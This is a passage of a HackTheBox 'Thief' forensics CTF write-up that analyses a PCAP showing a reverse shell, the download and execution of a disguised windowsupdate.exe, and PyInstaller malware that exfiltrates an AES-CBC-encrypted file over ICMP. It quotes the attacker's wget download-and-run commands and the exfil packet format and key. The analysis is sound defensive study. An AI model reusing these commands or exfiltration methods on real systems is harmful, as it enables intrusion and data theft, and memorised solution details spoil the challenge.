forensicsfreemedium

Thief Challenge Scenario

HackTheBox

Task: analyze a PCAP and recovered malware from a host compromise where data is stolen over ICMP. Solution: recover the PyInstaller payload, reverse its AES-CBC exfil format, rebuild chunk order from ICMP id/seq, decrypt the PNG, and read the flag.

$ ls tags/ techniques/
pcapaes_cbcpyinstallermalwareexfiltrationscapyreverse_shellicmp
aes_cbc_decryptionprotocol_reverse_engineeringpcap_traffic_analysispyinstaller_malware_recoveryicmp_exfil_reassembly

$ cat /etc/rate-limit

Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.

Thief Challenge Scenario — HackTheBox

Description

Analyze the provided traffic capture and recovered files to determine what was exfiltrated and recover the flag.

We are given a PCAP, a recovered Windows executable, and the final recovered image. The goal is to understand the compromise chain, reverse the exfiltration method, reconstruct the stolen file, and extract the flag.

Analysis

Step 1: Quick traffic reconnaissance

The PCAP immediately showed two important phases:

  1. A large TCP transfer from 10.2.32.72 to 192.168.127.146
  2. Later ICMP traffic from the victim toward 172.67.139.222

There was also an interactive session on TCP/5349, which turned out to be a reverse shell. Commands visible in that shell included:

whoami
hostname
systeminfo
wget http://10.2.32.72:4953/windowsupdate.exe -outfile windowsupdate.exe
dir
windowsupdate.exe 1dub.png
./windowsupdate.exe 1dub.png

This gives the whole storyline: the attacker gained a shell, downloaded windowsupdate.exe from an internal HTTP server on port 4953, and executed it against 1dub.png.

Step 2: Recover the malware from HTTP

Exporting HTTP objects from the request GET /windowsupdate.exe on TCP/4953 recovered the payload exactly.

Basic triage:

file windowsupdate.exe
strings -n 6 windowsupdate.exe | rg 'scapy|Crypto|AES|exfil|Bloodharbor'

That quickly suggested a PyInstaller-packed Python sample using:

  • scapy for raw packet transmission
  • Crypto.Cipher.AES / PyCryptodome for encryption
  • the string exfil-
  • the static key material The Bloodharbor!

Decompiling the extracted .pyc with uncompyle6 revealed the core logic.

Step 3: Understand the exfiltration format

The malware reads the target file, splits it into 256-byte chunks, zero-pads the final chunk, and encrypts each chunk independently with AES-CBC.

The encrypted packet payload format is:

6-byte prefix:   exfil-
16-byte IV:      random per chunk
256-byte blob:   AES-CBC(ciphertext)

So each ICMP echo-request payload is exactly 278 bytes.

The key is static:

The Bloodharbor!

...